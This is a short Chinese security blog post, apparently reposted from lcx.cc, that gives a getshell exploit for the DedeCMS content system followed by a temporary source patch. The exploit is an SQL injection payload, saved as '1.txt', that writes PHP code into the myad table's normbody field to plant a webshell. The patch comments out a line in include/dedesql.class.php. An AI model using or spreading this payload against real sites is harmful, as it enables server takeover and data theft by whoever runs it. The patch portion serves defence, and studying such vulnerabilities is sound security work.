Dedecms getshell exp + 临时补丁

dede 好火 老衲也来凑个热闹吧

其实getshell 方法很多 不要一直纠结 怎么插入 mytag 表 比如附近的myad表就是个好地方 update 个一句话啥的 不多说了 不多说了 直接给 getshell exp吧

getshell exp

要修改密码啥的 直接改 1.txt吧

#1.txt

myad` SET  normbody='axxxxx'');echo ''OK'';@fclose($fp);?>'  where aid =1 #

演示:

临时补丁

不知道别的地方还有没有覆盖变量 反正这个漏洞是修复的 试了下 貌似不影响网站运行

include/dedesql.class.php

if(isset($GLOBALS['arrs1'])) 
    { 
        $v1 = $v2 = ''; 
        for($i=0;isset($arrs1[$i]);$i++) 
        { 
            $v1 .= chr($arrs1[$i]); 
        } 
        for($i=0;isset($arrs2[$i]);$i++) 
        { 
           // $v2 .= chr($arrs2[$i]);  //注释这里   
        } 
        $GLOBALS[$v1] .= $v2; 
    }

source

文章来源于lcx.cc:Dedecms getshell exp + 临时补丁

相关推荐: 【VB】GetAttr 获取文件/文件夹属性函数详解

    VB GetAttr 获取文件/文件夹属性函数详解，VB GetAttr 获取文件夹属性函数详解，VB GetAttr 获取文件属性函数详解，VB GetAttr 获取文件/文件夹属性函数，VB GetAttr 获取文件夹属性函数，VB GetAttr…